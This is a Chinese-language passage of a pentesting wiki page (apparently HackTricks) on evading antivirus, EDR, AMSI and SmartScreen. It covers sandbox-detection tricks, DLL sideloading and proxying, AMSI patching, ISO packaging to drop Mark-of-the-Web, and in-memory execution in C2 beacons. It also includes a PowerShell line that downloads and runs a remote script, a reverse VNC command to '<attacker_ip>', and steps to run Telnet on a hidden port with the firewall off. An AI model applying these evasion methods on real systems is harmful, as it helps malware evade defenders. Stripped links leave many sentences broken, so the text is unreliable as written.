Antivirus (AV) Bypass
最后更新于
最后更新于
本页由 编写!
目前,AV使用不同的方法来检查文件是否恶意,包括静态检测、动态分析,以及更高级的EDR中的行为分析。
静态检测通过在二进制文件或脚本中标记已知的恶意字符串或字节数组,并从文件本身提取信息(例如文件描述、公司名称、数字签名、图标、校验和等)来实现。这意味着使用已知的公共工具可能更容易被发现,因为它们可能已经被分析并标记为恶意。有几种方法可以绕过这种检测:
加密
如果加密二进制文件,则AV无法检测到您的程序,但您需要某种加载程序来解密并在内存中运行程序。
混淆
有时,您只需要更改二进制文件或脚本中的一些字符串,就可以使其通过AV,但这可能是一项耗时的任务,具体取决于您尝试混淆的内容。
自定义工具
如果开发自己的工具,则不会有已知的恶意签名,但这需要大量时间和精力。
动态分析是指AV在沙箱中运行您的二进制文件并监视恶意活动(例如尝试解密并读取浏览器密码,对LSASS执行minidump等)。这部分可能会更加棘手,但以下是一些可以用来逃避沙箱的方法。
执行前休眠 根据实现方式,这可能是绕过AV动态分析的好方法。AV有很短的时间来扫描文件,以免打断用户的工作流程,因此使用长时间的休眠可能会干扰二进制文件的分析。问题在于许多AV沙箱可能会根据实现方式跳过休眠。
检查机器资源 通常,沙箱的资源非常有限(例如<2GB RAM),否则可能会减慢用户的机器。您还可以在这里非常有创意,例如通过检查CPU温度甚至风扇转速,不是所有内容都会在沙箱中实现。
特定于机器的检查 如果您想针对加入“contoso.local”域的工作站用户进行定位,可以检查计算机的域,看看是否与您指定的域匹配,如果不匹配,则可以使您的程序退出。
事实证明,Microsoft Defender的沙箱计算机名是HAL9TH,因此,您可以在引爆前检查恶意软件中的计算机名,如果名称与HAL9TH匹配,则意味着您在Defender的沙箱中,因此可以使您的程序退出。
正如我们在本文中之前所说,公共工具最终将被检测到,因此,您应该问自己一个问题:
例如,如果您想转储LSASS,您真的需要使用mimikatz吗?或者您可以使用一个不太知名但也可以转储LSASS的项目。
正确答案可能是后者。以mimikatz为例,它可能是AV和EDR中最被标记的恶意软件之一,虽然项目本身非常酷,但要绕过AV,与其使用它,还不如寻找您尝试实现的目标的替代方案。
在可能的情况下,始终优先使用DLL进行逃避,根据我的经验,DLL文件通常检测和分析要少得多,因此这是一个非常简单的技巧,可用于在某些情况下避免检测(如果您的有效负载有某种方式作为DLL运行)。
正如我们在这张图片中看到的,Havoc的DLL有效负载在antiscan.me中的检测率为4/26,而EXE有效负载的检测率为7/26。
现在我们将展示一些您可以使用DLL文件的技巧,使其更加隐蔽。
DLL 旁路加载 利用加载程序使用的 DLL 搜索顺序,通过将受害应用程序和恶意载荷放置在一起来实现。
这个命令将输出在"C:\Program Files\"目录下易受DLL劫持影响的程序列表,以及它们尝试加载的DLL文件。
我强烈建议你自己探索DLL劫持/侧载程序,这种技术如果做得很隐蔽,是相当有效的,但如果你使用公开已知的DLL侧载程序,可能会很容易被发现。
仅仅通过放置一个恶意DLL并命名为程序期望加载的DLL,并不会加载你的有效负载,因为程序期望在该DLL中有一些特定的函数,为了解决这个问题,我们将使用另一种称为DLL代理/转发的技术。
DLL代理将程序从代理(和恶意)DLL发出的调用转发到原始DLL,从而保留程序的功能并能够处理执行你的有效负载。
以下是我遵循的步骤:
最后一个命令会给我们2个文件:一个DLL源代码模板和原始重命名的DLL。
这些是结果:
Freeze 是一个绕过 EDRs 的 payload 工具包,使用挂起进程、直接系统调用和替代执行方法
您可以使用 Freeze 以隐秘的方式加载和执行您的 shellcode。
AMSI功能已集成到Windows的以下组件中。
用户帐户控制(UAC)(提升EXE、COM、MSI或ActiveX安装)
PowerShell(脚本、交互式使用和动态代码评估)
Windows脚本宿主(wscript.exe和cscript.exe)
JavaScript和VBScript
Office VBA宏
它允许防病毒解决方案检查脚本行为,通过以未加密和未混淆的形式公开脚本内容。
运行IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')将在Windows Defender上产生以下警报。
请注意,它在路径之前加上amsi:,然后是脚本运行的可执行文件的路径,本例中为powershell.exe
我们没有将任何文件写入磁盘,但由于AMSI的存在,仍然在内存中被捕获。
有几种方法可以规避AMSI:
混淆
由于AMSI主要用于静态检测,因此修改您尝试加载的脚本可能是规避检测的好方法。
但是,即使脚本有多个层,AMSI也有解混淆脚本的能力,因此,取决于如何执行,混淆可能不是一个好选择。这使得规避并不是那么直截了当。尽管如此,有时候,您只需要更改几个变量名,就可以避免被检测,因此这取决于某些内容被标记的程度。
AMSI绕过
由于AMSI是通过将DLL加载到powershell(也包括cscript.exe、wscript.exe等)进程中实现的,因此即使作为非特权用户运行,也可以轻松篡改它。由于AMSI实现中存在这个缺陷,研究人员已经找到了多种规避AMSI扫描的方法。
强制错误
只需要一行PowerShell代码就可以使AMSI对当前PowerShell进程无效。当然,这行代码已经被AMSI本身标记,因此需要进行一些修改才能使用这种技术。
内存补丁
有几种工具可用于混淆C#明文代码,生成元编程模板以编译二进制文件或混淆已编译的二进制文件,例如:
当从互联网下载并执行一些可执行文件时,您可能会看到这个屏幕。
Microsoft Defender SmartScreen是一种旨在保护最终用户免受运行潜在恶意应用程序的安全机制。
SmartScreen主要采用基于声誉的方法,意味着不常见的下载应用程序将触发SmartScreen,从而警告并阻止最终用户执行文件(尽管仍可以通过单击更多信息 -> 仍然运行来执行文件)。
防止您的有效负载获得Mark of The Web的一种非常有效的方法是将它们打包到某种容器中,比如ISO。这是因为Mark-of-the-Web(MOTW)无法应用于非NTFS卷。
示例用法:
将C#二进制文件加载到内存中已经为人所知已久,仍然是一种非常好的方法,可以在运行后渗透工具时避免被杀毒软件发现。
由于有效负载将直接加载到内存中而不会触及磁盘,我们只需要担心为整个过程打补丁AMS。大多数C2框架(如sliver、Covenant、metasploit、CobaltStrike、Havoc等)已经提供了直接在内存中执行C#程序集的能力,但有不同的执行方式:
分叉和运行
它涉及生成一个新的牺牲进程,将您的后渗透恶意代码注入到该新进程中,执行您的恶意代码,完成后终止新进程。这种方法的好处和缺点都有。分叉和运行方法的好处在于执行发生在我们的Beacon植入进程之外。这意味着如果我们的后渗透操作出了问题或被发现,我们的植入物存活的机会要大得多。缺点是您被行为检测发现的机会更大。
内联
这是将后渗透恶意代码注入到自己的进程中。这样,您可以避免创建新进程并使其被杀毒软件扫描,但缺点是如果执行有效负载时出现问题,您的Beacon丢失的可能性要大得多,因为它可能会崩溃。
通过允许访问解释器二进制文件和SMB共享上的环境,您可以在受损机器的内存中执行这些语言中的任意代码。
该存储库指出:Defender仍然会扫描脚本,但通过利用Go、Java、PHP等,我们有更多灵活性来绕过静态签名。在这些语言中使用随机未混淆的反向外壳脚本进行测试已被证明是成功的。
逃避是一个非常复杂的主题,有时您必须考虑一个系统中许多不同来源的遥测,因此在成熟的环境中完全不被检测到几乎是不可能的。
您对抗的每个环境都有其优势和劣势。
在Windows10之前,所有Windows都带有一个Telnet服务器,您可以安装它(作为管理员)执行:
让它在系统启动时启动,现在运行它:
更改telnet端口(隐蔽)并禁用防火墙:
在主机上:执行 winvnc.exe 并配置服务器:
启用选项 Disable TrayIcon
在 VNC Password 中设置密码
在 View-Only Password 中设置密码
然后,将二进制文件 winvnc.exe 和新创建的文件 UltraVNC.ini 移动到受害者内
攻击者应该在主机内执行二进制文件 vncviewer.exe -listen 5900,这样它将准备好捕获反向VNC连接。然后,在受害者内:启动 winvnc 守护程序 winvnc.exe -run 并运行 winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900
**警告:**为了保持隐蔽,您必须避免做一些事情
在GreatSCT内部:
现在使用 msfconsole -r file.rc 启动 lister,然后执行以下 xml payload:
当前的防御程序会非常快速地终止该进程。
https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
使用以下命令进行编译:
使用方法:
自动下载和执行:
我强烈建议您查看这个关于实际AV逃避的。
提供的其他针对沙箱的一些建议
您可以使用 和以下 PowerShell 脚本检查易受 DLL 旁路加载攻击的程序:
我将使用的项目。
我们的 shellcode(使用 编码)和代理 DLL 在 中都有 0/26 的检测率!我会称之为成功。
我强烈建议您观看 关于 DLL Sideloading 以及 以更深入地了解我们讨论的内容。
AMSI旨在防止“”。最初,防病毒软件只能扫描磁盘上的文件,因此,如果您以某种方式直接在内存中执行载荷,防病毒软件无法阻止它,因为它没有足够的可见性。
强制AMSI初始化失败(amsiInitFailed)将导致当前进程不会启动任何扫描。最初由披露,微软已经开发了一个签名来防止更广泛的使用。
这是我从这个中获取的修改后的AMSI绕过方法。
这种技术最初是由发现的,它涉及查找amsi.dll中“AmsiScanBuffer”函数的地址(负责扫描用户提供的输入),并用指令覆盖它以返回E_INVALIDARG代码,这样,实际扫描的结果将返回0,被解释为干净的结果。
请阅读以获取更详细的解释。
还有许多其他用于绕过PowerShell的AMSI的技术,请查看和以了解更多信息。
:C#混淆器
:该项目的目标是提供编译套件的开源分支,能够通过和防篡改提供增强软件安全性。
:ADVobfuscator演示了如何使用C++11/14语言在编译时生成混淆代码,而不使用任何外部工具并且不修改编译器。
:通过C++模板元编程框架生成一层混淆操作,使想要破解应用程序的人的生活变得更加困难。
**:Alcatraz是一种x64二进制混淆器,能够混淆各种不同的pe文件,包括:.exe、.dll、.sys
:Metame是一个用于任意可执行文件的简单变形代码引擎。
:ROPfuscator是一个针对LLVM支持的语言使用ROP(返回导向编程)的细粒度代码混淆框架。ROPfuscator通过将常规指令转换为ROP链来在汇编代码级别混淆程序,从而扰乱我们对正常控制流的自然概念。
:Nimcrypt是一个用Nim编写的.NET PE加密器。
**:Inceptor能够将现有的EXE/DLL转换为shellcode,然后加载它们。
MoTW(Mark of The Web)是一个带有Zone.Identifier名称的,在从互联网下载文件时会自动创建,以及它被下载的URL。
是一个将有效负载打包到输出容器中以规避Mark-of-the-Web的工具。
以下是使用将有效负载打包在ISO文件中绕过SmartScreen的演示。
如果您想了解更多关于C#程序集加载的信息,请查看这篇文章以及他们的InlineExecute-Assembly BOF ()
您还可以从PowerShell加载C#程序集,请查看和。
如中提出的,通过让受损机器访问安装在攻击者控制的SMB共享上的解释器环境,可以使用其他语言执行恶意代码。
我强烈建议您观看的这个演讲,以了解更多关于高级逃避技术的入门。
这也是关于深度逃避的另一个很棒的演讲。
您可以使用,它将删除二进制文件的部分,直到找出Defender发现为恶意的部分并将其拆分给您。 另一个执行相同操作的工具是,提供在上的开放网络服务。
从以下链接下载:(下载二进制文件,而不是安装程序)
如果winvnc已经在运行,请不要启动它,否则会触发。使用tasklist | findstr winvnc检查是否正在运行
不要在没有UltraVNC.ini的同一目录中启动winvnc,否则会导致打开
不要运行winvnc -h以获取帮助,否则会触发
从以下链接下载:
C#混淆器列表:
如果您想在HackTricks中看到您的公司广告或下载PDF格式的HackTricks,请查看!
获取
探索,我们的独家
加入 💬 或 或 关注我们的Twitter 🐦 。
通过向和 github仓库提交PR来分享您的黑客技巧。
